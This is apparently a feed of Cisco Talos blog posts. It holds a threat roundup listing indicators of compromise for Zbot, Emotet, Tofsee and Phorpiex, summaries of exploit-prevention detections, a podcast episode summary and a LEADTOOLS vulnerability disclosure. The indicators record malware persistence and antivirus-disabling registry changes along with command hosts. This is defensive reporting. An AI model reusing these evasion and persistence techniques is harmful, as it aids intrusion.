1466341e7ff5ca7511306ddd2253a03f5b81cfab21bda6ddd32047bd3f7e4011 14b65331773ad534dada9c7b055e34a1e6ab2a54f3d8eec4d1da6298f0477c71 1564fc8499c21f5426c4f15aaab34acc8936b43df39464f88003209c0ae3ea17 15c6ec4928627e4f9c56c567811e5b0b0b6c20b32374ac931257145d42365b61
*See JSON for more IOCs

Coverage

ProductProtection
AMPThis has coverage
Cloudlock N/A
CWSThis has coverage
Email SecurityThis has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat GridThis has coverage
UmbrellaThis has coverage
WSAThis has coverage

Screenshots of Detection

AMP


ThreatGrid



Umbrella




Win.Trojan.Zbot-7414153-0

Indicators of Compromise

Registry KeysOccurrences
<HKCU>\SOFTWARE\MICROSOFT\INTERNET EXPLORER\PRIVACY
Value Name: CleanCookies
1
<HKCU>\SOFTWARE\MICROSOFT\DUQY
Value Name: Sianile
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Uroxiqakh
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.101
Value Name: CheckSetting
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.103
Value Name: CheckSetting
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.100
Value Name: CheckSetting
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.102
Value Name: CheckSetting
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.104
Value Name: CheckSetting
1
<HKCU>\SOFTWARE\MICROSOFT\DUQY 1
MutexesOccurrences
GLOBAL\{<random GUID>}1
Local\{<random GUID>}1
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
5[.]56[.]133[.]471
Files and or directories createdOccurrences
%System32%\wbem\Logs\wbemprox.log1
%TEMP%\tmp647c181c.bat1
%TEMP%\tmp246f2f8d.bat1
%APPDATA%\Adbe1
%APPDATA%\Adbe\udef.unu1
%APPDATA%\Cukeba1
%APPDATA%\Cukeba\xoafe.idl1
%APPDATA%\Olehse1
%APPDATA%\Olehse\okop.exe1
%APPDATA%\Fireh\isnib.exe1
%APPDATA%\Igyg\cuhia.obu1
%APPDATA%\Igyg\cuhia.tmp (copy)1

File Hashes

072bcc63bca4fa1946c71a3f9562a6d76af8fd1a5034132e2befbbde9aba9c98 15c235fefdfd798bff9bf039155762f0c0674cbf239c10df6aca52a7e2139488 2ccfd0f36677f438ff1120f21d6e5929d91531fd965dda6232ddd6de7a0c52d9 37403ce75f4908eb2e823a4e8c56c410e57441dde38c022819521a7fc3358701 40ecf36a4c2474cfff01980d68602d7bbaacfca2bdfda5ac58390b57c73b424a 522ce96681db4ef5d4731a8cf2007e7a46e650fc2f547f88d492700970b6af61 5409660ef23234d04ad204cb3791a96b3895286e258be036bfb43410e1dca08f 59b94ae4bdf3a3f4291e67e73316632b73a369391fbed4d8f3259d0ff0dc5468 66c6cb07d601f35490752227fe1d4687fbbc47af0f219eb178f89c670adccb0a 8914444fb30823c586d7df581c201dad5f1428284b7880395f2bc49ece5a1611 8daf28936db0201df94f89bd80acaae000fa018f93d6d1a1dc131b91be665382 8ea4ffdbfb16cd39bdf20a5a51ffbd6a523b78ad9a2c78bfffb46fcf0653f550 924f2ea483135213b988584241da5e5b8b152ab427fa933089e493d2dcd92c34 a807970fdd58b833a23e0c8b611a17ea5448399336f3ec0a3ecd5036486c0b08 b22e02f4a2e6a2deabbc8ed5c7ff7d30c07c43d80e8d9d50ca1c85724a008619 b2787b4197407051f4a5fe4ddc6b483d3245222d0b6301ba67e7feae14b87342 b5f339fcebb67c4826f94c31eab0a3e8e8137a65204b03c8ee6a72a1a313a48e bf315e9e1ac06c214296722191b08a2925e5ed49dfcbba616606b8422047cb63 e014acc73e32e1d1cb74ab4049b46abb2bd5c06ee9d4c82aeca7f4440cbb011d e3ced6661c4f5fd339cba232c6693c79d30dd5bc8db5882e7a86e959537af18d f50b78d0ffed37ecbab524a44b4606ab7246711b3487af0a17343fb5fc93ffba fa58139b16a96c81b415d2cfe950fff73ca98ba9f0e09c753cb16cbb4b18b820

Coverage

ProductProtection
AMPThis has coverage
Cloudlock N/A
CWSThis has coverage
Email SecurityThis has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat GridThis has coverage
Umbrella N/A
WSA N/A

AMP


ThreatGrid




Doc.Downloader.Emotet-7413880-1

Indicators of Compromise

Registry KeysOccurrences
<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS
Value Name: ProxyEnable
15
<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS
Value Name: ProxyServer
15
<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS
Value Name: ProxyOverride
15
<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS
Value Name: AutoConfigURL
15
<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS
Value Name: AutoDetect
15
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\FUNCSITKA 13
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\FUNCSITKA
Value Name: Type
13
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\FUNCSITKA
Value Name: Start
13
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\FUNCSITKA
Value Name: ErrorControl
13
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\FUNCSITKA
Value Name: ImagePath
13
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\FUNCSITKA
Value Name: DisplayName
13
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\FUNCSITKA
Value Name: WOW64
13
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\FUNCSITKA
Value Name: ObjectName
13
<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ONDEMANDINTERFACECACHE 2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\SESSIONINFO\1\APPLICATIONVIEWMANAGEMENT\W32:0000000000080070 2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\SESSIONINFO\1\APPLICATIONVIEWMANAGEMENT\W32:0000000000080070
Value Name: VirtualDesktop
2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\SESSIONINFO\1\APPLICATIONVIEWMANAGEMENT\W32:000000000001025C 2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\SESSIONINFO\1\APPLICATIONVIEWMANAGEMENT\W32:000000000001025C
Value Name: VirtualDesktop
2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\TITLEHANT 2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\TITLEHANT
Value Name: Type
2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\TITLEHANT
Value Name: Start
2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\TITLEHANT
Value Name: ErrorControl
2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\TITLEHANT
Value Name: ImagePath
2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\TITLEHANT
Value Name: DisplayName
2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\TITLEHANT
Value Name: WOW64
2
MutexesOccurrences
Global\I98B68E3C13
Global\M98B68E3C13
Global\IC019706B2
Global\MC019706B2
Global\Nx534F51BC1
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
59[.]110[.]18[.]23615
103[.]211[.]218[.]20515
45[.]56[.]88[.]9112
51[.]254[.]137[.]1568
192[.]241[.]131[.]797
51[.]68[.]220[.]2446
206[.]81[.]10[.]2154
217[.]149[.]241[.]1213
74[.]208[.]5[.]152
169[.]254[.]255[.]2552
17[.]36[.]205[.]741
173[.]194[.]204[.]1091
94[.]100[.]180[.]1601
107[.]14[.]73[.]681
81[.]88[.]48[.]661
184[.]106[.]54[.]111
208[.]124[.]213[.]1861
95[.]216[.]33[.]711
64[.]41[.]126[.]1101
64[.]98[.]36[.]1731
94[.]152[.]153[.]1341
143[.]95[.]235[.]371
216[.]177[.]141[.]151
52[.]96[.]38[.]821
173[.]254[.]28[.]1251
*See JSON for more IOCs
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
headonizm[.]in15
qantimagroup[.]com8
smtp[.]mail[.]com2
smtpout[.]secureserver[.]net2
smtp-mail[.]outlook[.]com1
smtp[.]mail[.]ru1
ssl0[.]ovh[.]net1
smtp[.]qiye[.]163[.]com1
mail1[.]hostingplatform[.]com1
smtp[.]corteshermanos[.]com1
mail[.]rekaicentres[.]com1
mail[.]fusat[.]cl1
mail[.]hces[.]net1
mail[.]mccmh[.]net1
manabi[.]ecuahosting[.]net1
smtp[.]cuttingedgestoneworks[.]com1
p52-smtp[.]mail[.]me[.]com1
smtp[.]siteprotect[.]com1
lawyers-mail[.]com1
mail[.]ec[.]rr[.]com1
just125[.]justhost[.]com1
mail[.]effinger-zentrum[.]ch1
mail[.]smscomm[.]net1
authsmtp[.]securemail[.]pro1
mail[.]lignum[.]com[.]gt1
*See JSON for more IOCs
Files and or directories createdOccurrences
%HOMEPATH%\419.exe15
%ProgramData%\Microsoft\Crypto\RSA\S-1-5-18\9bdfb692c085f99347f09462e5cd5445_9979f91c-9ae8-458a-b442-fe95beaeef262
%ProgramData%\gny7.exe1

File Hashes

0a574aa7865ad973827f08457d92a690b80c51594c0cc95345062f4838d38aab 1220dd6c5523dc0b6b6409e5b739216bc979826bcb8e43428f0889ff120fd63d 1ff11781388f142f3dd92900380de4501f12f652d20911b502dbea6d4e7c2533 2c9b1c7443421bc46987ae098dd00fa013b9722dfe6b6b518c3ab474d888d984 456f0957a36e00bf03b0e37d18e119d74b3bb08054f6248a2e7e87ddb93d7782 4bbdbcf77feea35ec8ebddead4ed7274c8404c5fe2df5d24029488424f1ce875 81fc2cb7ae6b7006b185b89427136ab8a520cbd687d0bbb5f1fc31b1a1c0f4ba 83fe7400534e8efcc5cec209b9b2835d61be0d88914bbfd6495fb675378aa2dd 8c483708b5b4230562f3d0d4dce10c6168b94ccb6e85ff5052c42513feda741e 9f48da5cd641b0bb9dffd3dec5d2442da67ed23367331eb8c181fc61ee54c41e c8078630214d7c029d23de03dedb7fab8a2f7f8df12ba99245682e3ca235179b ce11fa55f6717dadca7bdd3759b3d46217d085e78ea8bb94bb8145754741b5c5 e0ab84847c95820096ec02c1c23c15589320ddc180e6d9f0d61315409b755dc8 e74421edc6c5a113acbd4f754d64ac9502f59cbdae14ffa129357bc5251e9afc f3de992434fc44f62318ddbe2c209a11af19205bb347dac52d7534e7f3c5579a

Coverage

ProductProtection
AMPThis has coverage
Cloudlock N/A
CWSThis has coverage
Email SecurityThis has coverage
Network SecurityThis has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat GridThis has coverage
UmbrellaThis has coverage
WSAThis has coverage

Screenshots of Detection

AMP


ThreatGrid


Umbrella


Malware




Win.Dropper.Tofsee-7431752-0

Indicators of Compromise

Registry KeysOccurrences
<HKU>\.DEFAULT\CONTROL PANEL\BUSES 14
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> 14
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: Type
14
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: Start
14
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: ErrorControl
14
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: DisplayName
14
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: WOW64
14
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: ObjectName
14
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: Description
14
<HKU>\.DEFAULT\CONTROL PANEL\BUSES
Value Name: Config0
14
<HKU>\.DEFAULT\CONTROL PANEL\BUSES
Value Name: Config1
14
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: ImagePath
11
<HKU>\.DEFAULT\CONTROL PANEL\BUSES
Value Name: Config3
9
<HKU>\.DEFAULT\CONTROL PANEL\BUSES
Value Name: Config2
9
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\lesyxfla
2
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\slzfemsh
2
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\rkyedlrg
2
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\haoutbhw
1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\athnmuap
1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\jcqwvdjy
1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\piwcbjpe
1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\dwkqpxds
1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\fymsrzfu
1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\xqekjrxm
1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\qjxdckqf
1
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
67[.]195[.]228[.]110/3115
172[.]217[.]197[.]26/3115
69[.]55[.]5[.]25014
43[.]231[.]4[.]714
64[.]233[.]186[.]26/3114
81[.]19[.]78[.]64/3014
98[.]136[.]96[.]74/3114
98[.]136[.]96[.]76/3114
85[.]114[.]134[.]8814
77[.]88[.]21[.]8913
209[.]85[.]202[.]26/3113
172[.]217[.]7[.]13213
213[.]180[.]193[.]8912
67[.]195[.]204[.]72/3012
148[.]163[.]158[.]511
67[.]195[.]228[.]10911
67[.]195[.]228[.]9410
31[.]31[.]194[.]100/3110
98[.]136[.]96[.]92/3110
46[.]4[.]52[.]1099
67[.]195[.]204[.]799
46[.]28[.]66[.]29
78[.]31[.]67[.]239
188[.]165[.]238[.]1509
93[.]179[.]69[.]1099
*See JSON for more IOCs
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
250[.]5[.]55[.]69[.]in-addr[.]arpa14
microsoft-com[.]mail[.]protection[.]outlook[.]com14
list[.]ru13
mx0b-001b2d01[.]pphosted[.]com11
mx[.]yandex[.]ru9
yandex[.]ru9
mta5[.]am0[.]yahoodns[.]net9
mx-aol[.]mail[.]gm0[.]yahoodns[.]net9
aol[.]com9
yahoo[.]co[.]uk9
irina94[.]rusgirls[.]cn9
anastasiasweety[.]rugirls[.]cn9
beautyrus[.]cn9
smtp[.]secureserver[.]net8
mxs[.]mail[.]ru8
mail[.]ru8
mx[.]yandex[.]net8
eur[.]olc[.]protection[.]outlook[.]com8
hotmail-com[.]olc[.]protection[.]outlook[.]com8
mx1[.]emailsrvr[.]com8
mx-apac[.]mail[.]gm0[.]yahoodns[.]net7
bk[.]ru7
mx-eu[.]mail[.]am0[.]yahoodns[.]net7
inbox[.]ru7
smtp-in[.]orange[.]fr7
*See JSON for more IOCs
Files and or directories createdOccurrences
%TEMP%\<random, matching '[a-z]{8}'>.exe16
%System32%\<random, matching '[a-z]{8}\[a-z]{6,8}'>.exe (copy)16
%SystemRoot%\SysWOW64\config\systemprofile14
%SystemRoot%\SysWOW64\config\systemprofile:.repos14
%SystemRoot%\SysWOW64\<random, matching '[a-z]{8}'>14
%TEMP%\hjekdqa.exe1
%TEMP%\yavbuhr.exe1

File Hashes

109ca5f094a4e98b6dac4191043bcbc4a9e849a456ca581226f42fdd7812966a 2835bade0deb4c1f1af1beff0102a7122990fd5b868f82b5f23b5ddea782d862 284d642a2ae70ba3890f39595cf215c06037f514580bcc8766b3c136cb1c4df9 2c84c7ac4fdbcaba7ac72b01a03d5ee7d62db4e4986670d17d420a45872f3158 30cadaa9bbf5f83ebad9e4738db169bacca7f78b4ae4256cc326533099dd64c2 64a3e41af01cf5443314c0d49d7a83f081c99dbadda2dfe2af5d93ff49464f4b 74ac087c43dc71971fddc1d65b4586b57d4b6ec6182914d0d176722a3a70b4bc 7c6e8e91b032ae87eb17d1ff4edfdbf9f3d2b7e6cc1849cadffd40650f073538 84c98359fa8967beb941ffa16550358d39e1fd005dccbc697267b6f170c08aeb 91637560be3528716ac0c5586b39c763c54798a0b03a55db086a3128fa665fee 973e8cb33dae5fab6505ffb140ad80587081f131bb6bb5305582e874ec8d10b0 d0ec6c954e91bde1e104cec6f316aa1d2f94389883d602790aec0128f492547c e46c3033d16ed60026ee74546aaaf17fe0e0dccfe9c40bd0b434758c01fc8a17 eab97c31815fc018ec26360c575b02ec3cf7595c1c4c6bcd121ee2123335515f eaf18fa3b771523ea252436b6dd15d1c2e0d6f93a17f5a861251dbc38f0cf951 f551911671d006e8164ba14c2024bbe55646f5e1ec6c4fb16b7f199c51be6864

Coverage

ProductProtection
AMPThis has coverage
Cloudlock N/A
CWSThis has coverage
Email SecurityThis has coverage
Network SecurityThis has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat GridThis has coverage
UmbrellaThis has coverage
WSAThis has coverage

Screenshots of Detection

AMP


ThreatGrid


Umbrella




Win.Downloader.Phorpiex-7428338-0

Indicators of Compromise

Registry KeysOccurrences
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
Value Name: AntiVirusOverride
17
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
Value Name: AntiVirusDisableNotify
17
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
Value Name: FirewallDisableNotify
17
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
Value Name: FirewallOverride
17
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
Value Name: UpdatesDisableNotify
17
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SYSTEMRESTORE
Value Name: DisableSR
17
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
Value Name: UpdatesOverride
17
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
Value Name: AutoUpdateDisableNotify
17
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Microsoft Windows Services
16
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Microsoft Windows Services
16
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Microsoft Windows Driver
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Microsoft Windows Driver
1
MutexesOccurrences
<random, matching [a-zA-Z0-9]{5,9}>5
55003300442
608074056801
650787086501
559708508601
4595000339401
88558589391
9595050303401
39494004039301
9747959760501
564956054701
88005500441
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
193[.]32[.]161[.]7710
94[.]156[.]133[.]656
92[.]63[.]197[.]1535
92[.]63[.]197[.]595
92[.]63[.]197[.]603
95[.]81[.]1[.]433
193[.]32[.]161[.]732
199[.]73[.]55[.]482
193[.]32[.]161[.]691
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
teubeufubg[.]su7
weoghehofu[.]su7
xiheiufisd[.]su7
aieieieros[.]su7
teoghehofu[.]su7
weubeufubg[.]su7
xeoghehofu[.]su7
wniaeninie[.]su7
tieieieros[.]su7
xieieieros[.]su7
aeoghehofu[.]su7
wiaeufaehe[.]su7
weuaueudgs[.]su7
wbaeubuegs[.]su7
wieieieros[.]su7
abaeubuegs[.]su7
tbaeubuegs[.]su7
aniaeninie[.]su7
xbaeubuegs[.]su7
teuaueudgs[.]su7
wiheiufisd[.]su7
xniaeninie[.]su7
tiheiufisd[.]su7
aiheiufisd[.]su7
aeubeufubg[.]su7
*See JSON for more IOCs
Files and or directories createdOccurrences
\_\DeviceManager.exe17
\.lnk17
E:\.lnk17
E:\_17
E:\_\DeviceManager.exe17
%APPDATA%\winsvcs.txt16
%SystemRoot%\20437002166322542
%SystemRoot%\2043700216632254\winpmmt.exe2
%SystemRoot%\5037867818202168\winxvbc.exe1
%SystemRoot%\1751841511079533\winhlyh.exe1
%SystemRoot%\1927513612308752\winqfmt.exe1
%SystemRoot%\7596387610791212\winthul.exe1
%SystemRoot%\199473721865105501
%SystemRoot%\19947372186510550\wingtph.exe1
%SystemRoot%\78159335195483111
%SystemRoot%\7815933519548311\winpyzz.exe1
%SystemRoot%\42326478167167131
%SystemRoot%\4232647816716713\winzsjy.exe1
%SystemRoot%\90822682190928261
%SystemRoot%\9082268219092826\winzpox.exe1
%SystemRoot%\61885417158974331
%SystemRoot%\6188541715897433\winngob.exe1
%SystemRoot%\19179736134368611
%SystemRoot%\1917973613436861\windcnw.exe1
%SystemRoot%\41401024140929281
*See JSON for more IOCs

File Hashes

12c7c57286a5c532800495f1b9c8c5415dbaf5539aec177009845e9ac3508be3 22854dc3febbab0b72663b08bbdda7a4ee4dc501764876b2160a8d982700b4f8 22b67655c0bee80c3afb4da0811ab18da62ca2b053f958864131722708c30be1 506e17946a441837e8c42374d565cfc7331bf2e706124aa122710cf19f380fcf 5150389a6d1c556e7d99671f1d3fbed15e5fd5cf01f26ea9638f08708a77a36f 63eb4701bed59eeeeb937dcae9d28631c98c886cf4a72e38e851a0725641922f 6dde1772c9b506f82178de0a14ad8cc7721c5f0dafb22088703b1e8dade3adc6 6f7aa9178d9cfdc6b873d54740d08f8bbb73a53f2d52453ec904d1314f5153b6 75e85527ae7786063af164c13b8c7df2f248cb4e7253d41ef444a3b84aba5219 9c88188624210f684d7aab8447c2fb50882139cca5d1bdac72838c4e76650251 af0e787fd0b006c04b60eb5d69b815d053ef774fa2d0be00a246ce4a018e85cf be5004b5f58595bfdf4cb2f317bc7dfb2d66f50f1adabb177b76fdab997a21bb c0c1e55d87fc372bba9454d65f4f99b64ee2002743f4195cba72bae642beb7f9 cbab761baf4042ba54d4471df336c65cecf253e5d2ad0a61e51199bf4355f3a5 cfc2091a57f78ac04de77c5dd72aae7be27d5633d87b0d104430f50ade7b6a73 e2ac54ca79debd49bbe0efc028d43f6793f23a903f4410003c0eba709cdff406 f0b61687dea12c0981e6226eaa6bfe3889c710b1347c6c8a89eb220bd4dc3204

Coverage

ProductProtection
AMPThis has coverage
Cloudlock N/A
CWSThis has coverage
Email SecurityThis has coverage
Network SecurityThis has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat GridThis has coverage
UmbrellaThis has coverage
WSAThis has coverage

Screenshots of Detection

AMP


ThreatGrid


Umbrella




Exploit Prevention

Cisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits. These exploits use certain features to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, even protecting against zero-day vulnerabilities.
CVE-2019-0708 detected - (15141)
An attempt to exploit CVE-2019-0708 has been detected. The vulnerability, dubbed BlueKeep, is a heap memory corruption which can be triggered by sending a specially crafted Remote Desktop Protocol (RDP request). Since this vulnerability can be triggered without authentication and allows remote code execution, it can be used by worms to spread automatically without human interaction.
Process hollowing detected - (348)
Process hollowing is a technique used by some programs to avoid static analysis. In typical usage, a process is started and its obfuscated or encrypted contents are unpacked into memory. The parent then manually sets up the first stages of launching a child process, but before launching it, the memory is cleared and filled in with the memory from the parent instead.
Dealply adware detected - (346)
DealPly is adware, which claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements on webpages. Adware has also been known to download and install malware.
Kovter injection detected - (334)
A process was injected into, most likely by an existing Kovter infection. Kovter is a click fraud Trojan that can also act as an information stealer. Kovter is also file-less malware meaning the malicious DLL is stored inside Windows registry and injected directly into memory using PowerShell. It can detect and report the usage of monitoring software such as wireshark and sandboxes to its C2. It spreads through malicious advertising and spam campaigns.
Excessively long PowerShell command detected - (287)
A PowerShell command with a very long command line argument that may indicate an obfuscated script has been detected. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell based threats.
Gamarue malware detected - (217)
Gamarue is a family of malware that can download files and steal information from an infected system. Worm variants of the Gamarue family may spread by infecting USB drives or portable hard disks that have been plugged into a compromised system.
Installcore adware detected - (110)
Install core is an installer which bundles legitimate applications with offers for additional third-party applications that may be unwanted. The unwanted applications are often adware that display advertising in the form of popups or by injecting into browsers and adding or altering advertisements on webpages. Adware is known to sometimes download and install malware.
Special Search Offer adware - (40)
Special Search Offer adware displays unwanted advertising in the form of popups or by injecting into browsers and altering advertisements on webpages. Adware has also been known to download and install malware.
Reverse http payload detected - (26)
An exploit payload intended to connect back to an attacker controlled host using http has been detected.
Corebot malware detected - (19)
Corebot is a Trojan with many capabilities found in other prominent families. It features a plugin system to enable it to load a variety of features from the C&C server at any time. Known plugins include RAT capabilities such as taking desktop screenshots, as well as being able to intercept and modify browser communications and steal data, especially data related to banking.

Beers with Talos Ep. #67: Inside Incident Response

$
0
0

By Mitch Neff.

Beers with Talos (BWT) Podcast episode No. 67 is now available. Download this episode and subscribe to Beers with Talos:

If iTunes and Google Play aren't your thing, click here.

Recorded Nov. 21, 2019 

Craig is out sick/injured/fighting robots (actually all three), so we brought in Sean Mason from Talos IR to talk shop today and give you the inside scoop on IR (and Sean’s next-level beard care regimen). How do incidents affect the enterprise and consumers? How has the advent of widespread ransomware fundamentally shifted the burden of responsibility in the c-suite and what have been the outcomes? What does a responder have in the bag when they arrive on-site?

The timeline:

  • 01:20 – Roundtable: Nigel heads to Anfield, show and tell with Joel, Matt wants Cats cosplay
  • 12:08 – Meet Sean Mason, head of Talos IR group.
  • 17:20 – Ransomware hand insurance have changed the conversation and shifted the burden for CISOs
  • 22:45 – Being proactive BEFORE the incident even occurs: and being the steadiest hand when it does
  • 30:40 – The moment Sean’s went wrong with “gif” - Tweet Craig for your chance at a Talos loot crate.
  • 34:15 – The crew infiltrates Sean’s teams chat channel, and they deliver top-shelf questions for Sean from the worst incidents they have seen (and USB keys in the parking lot) to the best headphones for travel
  • 45:35 – Sean finally figures out Matt and Mitch are all up in his team chat
  • 47:30 – Closing thoughts and parting shots

Some other links:

  • No links today
==========

Featuring: Joel Esler (@JoelEsler), Matt Olney (@kpyke), and Nigel Houghton (@EnglishLFC). Special Guest: Sean Mason (@SeanAMason)
Hosted by Mitch Neff (@MitchNeff)

Subscribe via iTunes (and leave a review!)


Subscribe to the Threat Source newsletter


Give us your feedback and suggestions for topics: beerswithtalos@cisco.com

Vulnerability Spotlight: Multiple vulnerabilities in LEADTOOLS software

$
0
0

Marcin Towalski and Cory Duplantis of Cisco Talos discovered these vulnerabilities. Blog by Jon Munshaw.

Cisco Talos recently discovered multiple vulnerabilities in the LEADTOOLS line of imaging toolkits. LEADTOOLS is a collection of toolkits designed to perform a variety of functions aimed at integrating documents, multimedia and imaging technologies into applications. All of the software is produced by LEAD Technologies Inc. LEADTOOLS offers prebuilt and portable libraries with an SDK for most platforms (Windows, Linux, Android, etc.), that are all geared toward building
applications for medical systems. Various pieces of LEADTOOLS contain vulnerabilities that could be exploited by malicious actors to carry out a number of actions, including denial-of-service conditions and the exposure of sensitive information.

In accordance with our coordinated disclosure policy, Cisco Talos worked with LEAD Technologies to ensure that these issues are resolved and that an update is available for affected customers.

Vulnerability details

LEADTOOLS JPEG2000 Isot parsing memory corruption vulnerability (TALOS-2019-0945/CVE-2019-5154)

An exploitable heap overflow vulnerability exists in the JPEG2000 parsing functionality of LEADTOOLS 20.0.2019.3.15. A specially crafted J2K image file can cause an out of bounds write of a null byte in a heap buffer, potentially resulting in code execution. An attack can specially craft a J2K image to trigger this vulnerability.

Read the complete vulnerability advisory here for additional information.

